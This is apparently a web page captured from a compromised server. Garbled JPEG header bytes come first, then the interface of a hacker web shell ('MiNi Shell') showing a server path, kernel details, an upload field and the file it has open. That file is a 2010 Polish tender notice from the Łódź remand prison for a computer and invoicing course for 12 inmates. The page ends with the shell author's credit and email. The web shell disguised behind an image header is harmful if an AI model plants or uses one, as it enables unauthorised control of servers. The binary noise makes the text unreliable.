JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100924/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100924/306312-N-2010.html

<p class="kh_header"><b>Łódź: Kurs komputerowy z modułem fakturowania, kod CPV 80533100 - 0 Usługi szkolenia komputerowego w wymiarze czasowym 90 godz. dla grupy 12 skazanych odbywających karę pozbawienia wolności w Areszcie Śledczym w Łodzi.</b><br>
<b>Numer ogłoszenia: 306312 - 2010; data zamieszczenia: 24.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Łodzi , ul. Smutna 21, 91-729 Łódź, woj. łódzkie, tel. (42) 675 00 00, faks (42) 675 03 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Areszt Śledczy w Łodzi.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kurs komputerowy z modułem fakturowania, kod CPV 80533100 - 0 Usługi szkolenia komputerowego w wymiarze czasowym 90 godz. dla grupy 12 skazanych odbywających karę pozbawienia wolności w Areszcie Śledczym w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> KURS Kurs komputerowy z modułem fakturowania

Cel kursu:
Teoretyczne i praktyczne przygotowanie uczestników kursu do obsługi komputera i wykorzystania go jako podstawowego narzędzia w pracy zawodowej oraz teoretyczne i praktyczne przygotowanie do wykonywania prac związanych z fakturowaniem.

1.1.Zakres tematyczny kursu winien zawierać:
a)podstawy obsługi systemu  WINDOWS:
- BHP na stanowisku komputerowym,
- budowę i zasady działania komputera,
- urządzenia zewnętrzne podłączane do komputera,
- właściwości systemu - panel sterowania,
- uruchamianie programów,
- organizacja menu START,
- narzędzia administracyjne,

b)podstawy obsługi edytora tekstu WORD:
- otwieranie i zamykanie dokumentów,
- ustawienia strony,
- formatowanie tekstu,
- rysowanie i formatowanie tabel,

c)arkusz kalkulacyjny:
- omówienie podstawowych funkcji programu,
- organizacja arkusza kalkulacyjnego,
- skróty klawiszowe przydatne w posługiwaniu się programem,
- wykorzystanie formuł do wykonywania prostych i nieco bardziej skomplikowanych obliczeń,
- metody odwoływania się do danych przechowywanych w innych komórkach, arkuszach, skoroszytach,
- budowanie tabel i ich formatowanie,
- wstawianie wykresów,
- wykonywanie obliczeń.

d)grafika prezentacyjna:
- zapoznanie z programem,
- narzędzia użytkowe,
- tworzenie prezentacji multimedialnych,
- wstawianie obiektów graficznych,
- tworzenie szablonu.

e)program do fakturowania:
wystawianie faktur VAT, paragonów, faktur korygujących,
obsługa transakcji gotówkowych i bezgotówkowych,
tworzenie kartoteki kontrahentów, towarów i dokumentów,
tworzenie raportów i zestawień.
1.2.  Organizacja kursu:
a)kurs obejmuje 12 osadzonych,
b)termin przeprowadzenia kursu: do 12 listopada 2010 r.
c)miejsce realizacji zamówienia:
Areszt Śledczy w Łodzi, 91-729 Łódź, ul. Smutna 21,
d)szkolenie winno obejmować 90 godzin (50 godzin zajęć z podstaw obsługi komputera oraz 40 godzin z obsługi programu do fakturowania). Przy czym jedną godzinę ZAMAWIAJĄCY rozumie jako godzinę lekcyjną tj. 45 min.
e)Zajęcia teoretyczne i praktyczne odbywać się będą na terenie Aresztu Śledczego w Łodzi ul. Smutna 21, 91-729 Łódź,
f)szkolenie musi odbywać się od poniedziałku do piątku,
g)zajęcia nie mogą zaczynać się wcześniej niż 8.30, a kończyć później niż 15.45,
h)maksymalna liczba godzin szkoleniowych w ciągu dnia nie może przekroczyć 7 godzin,
i)szkolenie musi zakończyć się egzaminem ze zdobytej wiedzy teoretycznej i praktycznej, oraz wydaniem odpowiedniej dokumentacji stwierdzającej ukończenie przedmiotowego szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (DZ.U z 2006r., nr 31, poz. 216).

1.3.  Zobowiązania WYKONAWCY

a)WYKONAWCA składający ofertę w postępowaniu o udzielanie zamówienia publicznego może stawić się w miejscu wskazanym jako miejsce do przeprowadzenia kursu, w celu zapoznania się z warunkami panującymi w miejscu prowadzenia kursu, 

b)WYKONAWCA  którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany jest do stawienia się min. na dwa dni przed rozpoczęciem szkolenia do zainstalowania dla wszystkich uczestników kursu, programu komputerowego służącego do fakturowania. 

c)WYKONAWCA zobowiązany jest wyposażyć każdego uczestnika kursu w niezbędne materiały dydaktyczne zgodnie z zakresem tematycznym kursu.
W trakcie zajęć uczestnicy muszą otrzymać materiały do zajęć praktycznych i ćwiczeń w postaci: materiałów biurowych (długopisy, zeszyty), oraz podręczników (podręcznik do obsługi komputera oraz obsługi WINDOWS i pakietu OFFICE, oraz podręcznik do obsługi programu do fakturowania).
d)WYKONAWCA zobowiązany jest do prowadzenia dokumentacji przebiegu szkolenia tj: m.in.:  
programu nauczania (Załącznik nr 2 do SIWZ)
(Program nauczania powinien odpowiadać wymogom określonym w paragrafie 5   
rozporządzenia Ministra Edukacji i Nauki z dnia 3.02.2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U.06.31.216).)
dziennika zajęć edukacyjnych zawierającego: 
listę obecności, 
wymiar godzin,
tematy zajęć edukacyjnych, 
protokołu egzaminacyjnego, 
rejestr wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia.

e)WYKONAWCA zobowiązuje się sprawdzać listę obecności każdego dnia kursu potwierdzeniem jest podpis uczestnika kursu przy konkretnej dacie (podpisy muszą być składane długopisem koloru niebieskiego),
f)WYKONAWCA zobowiązuje się dostarczyć 1 laptop dla 12-go uczestnika kursu, oprogramowanie zainstalowane na laptopie powinno być takie samo jak na komputerach zapewnionych przez ZAMAWIAJĄCEGO do realizacji kursu. WYKONAWCA zobowiązuje się dostarczyć laptop min. dzień przed rozpoczęciem kursu w celu kontroli przez służbę informatyczną jednostki. Na czas trwania kursu laptop powinien zostać na terenie jednostki.

g)Wykonawca zobowiązuje się do wystawienia faktury za przeprowadzenie kursu Kurs komputerowy z modułem do fakturowania następnego dnia po po zakończeniu szkolenia (do dnia 19.10.2010 r.).

1.4.  Do kosztów WYKONAWCY należy:

a)koszt badań lekarskich 12 uczestników kursu oraz 2 osób znajdujących się na liście rezerwowej,
b)koszt niezbędnych materiałów dydaktycznych: 
podręczników: do obsługi komputera, systemu WINDOWS  oraz pakietu OFFICE i obsługi programu do fakturowania, oraz materiałów  biurowych w postaci długopisów i zeszytów nie mogą przekroczyć 39 - 40% wartości ogólnej kwoty przeznaczonej na realizację zamówienia,
c)koszt ubezpieczenia uczestników kursu od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem. (Przed rozpoczęciem kursu WYKONAWCA przekaże kopie polisy ZAMAWIAJĄCEMU).
d)materiały  zakupione z środków przeznaczonych na realizację
           kursu stają się własnością ZAMAWIAJĄCEGO po jego zakończeniu.

1.5.   ZAMAWIAJĄCY zapewnia dla uczestników kursu:

dostęp do miejsca zajęć teoretycznych - salę multimedialną wyposażoną              w 11 stanowisk komputerowych z systemem  Microsoft Windows XP Professional wraz z pakietem biurowym Open Office i Microsoft Office 2007,WYKONAWCA gwarantuje    1 laptop dla 12-go uczestnika kursu,
dostęp do projektora multimedialnego wyposażonego min. w wyjście VGA,
dostęp do czarno - białej i kolorowej drukarki, umożliwiającej przygotowanie materiałów szkoleniowych (poglądowych) dla uczestników kursu.

1.6.  Program nauczania powinien odpowiadać wymogom określonym w paragrafie 5  
        rozporządzenia Ministra Edukacji i Nauki z dnia 3.02.2006r. w sprawie uzyskiwania  
        i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji 
        zawodowych w formach pozaszkolnych (Dz.U.06.31.216).

Wydane zaświadczenia muszą być zgodne z rozporządzeniem Ministra Edukacji i Nauki  z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualne zaświadczenie o wpisie instytucji szkoleniowej do Rejestru Instytucji Szkoleniowych wydane przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Doświadczenie rozumiane jako udokumentowane (np. na podstawie faktur, referencji itp.) przeprowadzenie min. trzech kursów (dla min. 10 osobowej grupy) o podobnej tematyce w okresie max. pięciu lat.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udział w postępowaniu mogą wziąć wykonawcy spełniający warunki opisane w art. 22 Ustawy - Prawo zamówień publicznych oraz nie wykluczeni z postępowania na podstawie art. 24 tej ustawy. Ocena spełniania wymienionych wyżej warunków będzie prowadzona na podstawie załączonych do oferty oświadczeń i dokumentów potwierdzających te oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można odebrać w siedzibie zamawiającego,lok.: 110, otrzymać za pośrednictwem Poczty Polskiej na pisemny wniosek, oraz na stronie internetowej www.sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2010 godzina 12:00, miejsce: Areszt Śledczy w Łodzi
ul. Smutna 21
91-729 Łódź
REGON 000590409
NIP 726-15-57-739
tel.042 675 00 00, fax.042 675 03 55
Adres e-mail: zp_as_lodz@sw.gov.pl
Adres internetowy: www.sw.gov.pl.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Cykl szkoleniowo-aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 1.3.4. Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com